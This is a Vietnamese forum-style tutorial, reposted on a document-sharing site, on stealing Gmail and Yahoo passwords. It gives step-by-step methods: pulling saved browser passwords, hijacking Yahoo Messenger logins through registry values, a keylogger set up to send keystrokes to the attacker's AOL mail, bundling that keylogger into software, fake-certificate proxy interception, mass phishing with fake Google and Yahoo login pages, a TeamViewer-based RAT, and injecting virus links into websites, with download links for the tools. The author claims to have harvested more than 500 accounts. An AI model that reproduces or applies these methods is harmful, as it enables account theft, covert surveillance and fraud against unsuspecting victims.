1. Trang chủ
  2. » Công Nghệ Thông Tin

kỹ thuật hack password gmail và yahoo

6 876 2

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 413,78 KB

Nội dung

Kỹ Thuật hack Password Gmail và Yahoo I - Exploit password được lưu lại trên các trình duyệt Hacker thường lợi dụng thói quen của người dùng thường lưu lại password các tài khoản trên t

Trang 1

Kỹ Thuật hack Password Gmail và Yahoo

I - Exploit password được lưu lại trên các trình duyệt

Hacker thường lợi dụng thói quen của người dùng thường lưu lại password các tài khoản trên trình duyệt để lần sau đăng nhập dễ hơn Khi có quyền điều máy tính của victim, password có thể bị lấy như sau:

- Đối với firefox password được lưu lại theo đường dẫn:

tool -> options ->security -> save password s-> show password

- Đối với IE hoặc chrome (cả firefox nữa) ta có thể dùng tool sau:

http://www.mediafire.com/?mj1mm8gx07m1db0 (pass dải nén: ducdung.08clc)

II - Password yahoo messenger được lưu lại:

Bạn vào run: regedit

Sau đó vào theo đường dẫn: HKEY_CURRENT_USER -> software -> yahoo ->paper

Click vào “paper”, bạn nhìn sang khung bên trái , ở cột name, bạn chú ý 2 mục có tên: “ETS” và

“Yahoo! User ID” Ta sang bên cột data()

+ ETS : chính là password ở dạng mã hóa

+ Yahoo! User ID: Chính là nickname yahoo

Vậy ta có thể làm được gì: Hình thức mã hóa với phiên bản beta 11 tôi chưa giải mã được Nhưng nếu coppy đoạn mã hóa password (ETS) từ máy của victim rồi thay vào máy của mình và thay cả nickname yahoo của victim vào “ Yahoo! User ID”, thì lúc khởi động, nickname của victim sẽ đăng nhập tự đông trên máy của mình

III - Sử Dụng Phần Mền Face Login:

Trang 2

Hacker sẽ sử dụng phần mền tạo ra một giao diện đăng nhập y hệt như “Yahoo Messenge”, rồi bằng cách nào đó đưa vào máy tính của victim Khi victim đăng nhập vào nick chat, thì toàn bộ

ID và pass sẽ được gửi về mail của hacker đã được thiết lập từ trước

Link download:

http://www.mediafire.com/?460dma29svhpd93

Tut hướng dẫn sử dụng:

www.mediafire.com/?n7fc1o2nko9ardr

IV- Sử dụng phần mền gián điệp keylogger:

Đó là hình thức ghi lại mọi hoạt động trên bàn phím của victim sau đó gửi về mail của hacker Trong quá trình sử dụng, tôi thích nhất là perfect keylogger

Chức năng: Ghi lại mọi thao tác bàn phím,những website đã vào, chụp ảnh màn hình destop rồi gửi về mail của hacker

Cách sử dụng: Bạn có thể search trên google Riêng có 1 điểm cần lưu ý, đó là khi thiết lập địa chỉ mail gửi về bạn nên chọn mail aol

Ví dụ cấu hình mail:

send to: ducdung123@aol.com

Smtp: smtp.aol.com

Username: ducdung123

Password: ***********

Key perfect logger có 2 phiên bản 1.68 và 1.75 Điểm khác nhau:

Trang 3

+ 1.68: có khả năng tạo tao ra virus (Chính là con keylogger mà hacker đã thiết lập) và đính kèm vào phần mền Khi người dùng cài phần mền đó thì keylogger cũng vô tình cũng cài trên máy đó luôn

Link download full: http://www.mediafire.com/?kg9t69t02b72gbx (pass: ducdung.08clc)

+ 1.75: Mạnh hơn 1.68 có thể qua mặt nhiều phần mền antivirus khi nó đã được cài đặt trên máy tính victim Nhưng không có khả năng tạo virus đính kèm vào phần mền như 1.68

Link download full: http://www.mediafire.com/?86h81b4961w4ib4 ( pass:ducdung.08clc)

Vi deo hướng dẫn sử dụng:

Link download: http://www.mediafire.com/?sswzmqhapmfxfh4

V - Giải mã ký tự password bị ẩn dưới dạng : *******

Vô tình bạn thấy password gmail hay yahoo của victim ở dạng ***** nó đã bị ẩn đi và bạn muốn đọc các ký tự đó:

Link down load: http://www.mediafire.com/?0qxzsk30k0izi0f

(pass dải nén: ducdung.08clc)

Tool này có thể sử dụng đối với tất cả các loại password với mọi phiên bản

VI- Sử dụng kỹ thuật giả mạo certificate:

Đây là một kỹ thuật rất hay, sử dụng hướng luồng thông tin đi qua cổng proxy đã được thiết

lâp trên máy của hacker Chính vì vậy hacker sẽ có toàn bộ thông tin của victim được gửi trên

internet bao gồm cả những thông tin nhạy cảm

Kỹ thuât này do anh “tocbatdat – giảng viên CEH trung tâm I-TRAIN” viết

Link download toàn bộ tool và tài liệu hướng dẫn:

http://www.mediafire.com/?zhw99ufbem6geaq

(Password giải nén: ducdung.08clc)

Trang 4

Bao gồm: +) burp suite v1.3

+) Quick_Batch_File_Compiler_3.21

+) Java bổ trợ

+) Đoạn mã thiết lập proxy tự động trên giao diện IE

+)Tài liệu hướng dẫn chi tiết được viết bởi anh tocbatdat

VII - Sử dụng kỹ thuật giả danh google hoặc yahoo:

Bộ tool đầy đủ :

+) Tool thu thập địa chỉ mail trên các website, diễn đàn rồi export ra dạng file text.( bao gồm cả key bản quyền.)

Link download: http://www.mediafire.com/?2e9w6b2sourzrvz

+)Tool gửi mail hàng loạt tầm 10.000 mail/ 1 buổi sáng (qua mail của server host webs)

Link download: http://www.mediafire.com/?72dv1x5307rf5i0

http://www.mediafire.com/?a54f76648no4xoa Nếu gửi bằng gmail thì sau vài lần sẽ bị ISP chặn lại với lý do spam

+) Site face login gmail và yahoo:

Đây là website giả mạo (giao diện giống site đăng nhập của gmail và yahoo), khi victim đăng nhập vào thông tin mail và pass trên site đó sẽ được gửi về địa chỉ hosting của hacker

Link download:

+ Gmail: http://www.mediafire.com/?qm29b24bnga1444

+ Yahoo: http://www.mediafire.com/?g42d731e5igvp9l

 Tóm lại, hacker sẽ dùng những tool trên và giả danh goolge hay yahoo rồi gửi mail cho victim yêu cầu click vào đường link đăng nhập để kiểm tra tính xác thực của tài khoản, mục đích là để loại bỏ những tài khoản ảo không có người dùng và nếu vicim không xác nhận, tài khoản đó sẽ bị khóa vĩnh viễn

Trang 5

+Video hướng dẫn sử dụng face login page:

Link download: http://www.mediafire.com/?o8mihcdp4lkathr

Với cách này trong đợt thử nghiệm lần trước, tôi đã thu thập thông tin ID và pass hơn 500 gmail người dùng

Một số tut tham khảo:

1 Đột nhập máy tinh qua teaview rat:

- Teamview rat được các phát triển dựa phần mền điều khiển máy tính người khác: teamview Nó được tạo ra dưới dạng file exe, khi victeam click vào thì phần mền teamview được cài đặt ở chế độ ẩn trên máy của victeam và gửi ID,pass về cho hacker

- Sau đó hacker sử dụng phần mền teamview với ID và pass đượch gửi về để điều khiển máy tính victeam mà họ vẫn không hề hay biết

Link Down :http://www.teamviewer.com/download/v ewer_Setup.exe Linkdown Teamview Rat : http://www.mediafire.com/?zznnxz1myei

Video hướng dẫn : http://www.mediafire.com/?in1zfnmhhj4

+) Bạn nên tao ra teaview rat trên win xp, tôi tạo ra trên win 7 thì nó thường chỉ gửi ID về

mà không gửi pass, nếu có gửi thì pass cũng thường bị lỗi

+) Victeam dùng xp, win 7, hay lap đều dính chưởng như nhau cả

+)Không vượt qua được các phần mền anti mạnh , nhưng nếu nó đã kích hoạt được trên máy thì 1 số anti không phát hiện được Trong quá trình xâm nhập có một số máy tính dùng kis nhưng vẫn bị dính chưởng

2 Tool hướng dẫn đính kèm virus lên các website:

bao gồm:

+)Mã Code gắn link lên code nguồn của website

+)Video hướng dẫn sử dụng

Link download: http://www.4shared.com/file/gExlc9Gf n_website.html

Trang 6

Tôi viết bài tut này mong được chia sẻ bạn với những newbie chưa biết và học hỏi thêm ở các bậc tiền bối trong diễn đàn về các kỹ thuật hack password, với phương châm hiểu hack

để chống hack Tôi không chịu trách nhiệm cũng như không khuyến cáo các bạn sử dụng nó

để xâm phạm quyền riêng tư của người khác

Thanks!

By: ducdung.08clc

Hàng không – Bách Khoa HN

Ngày đăng: 11/07/2014, 00:07

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w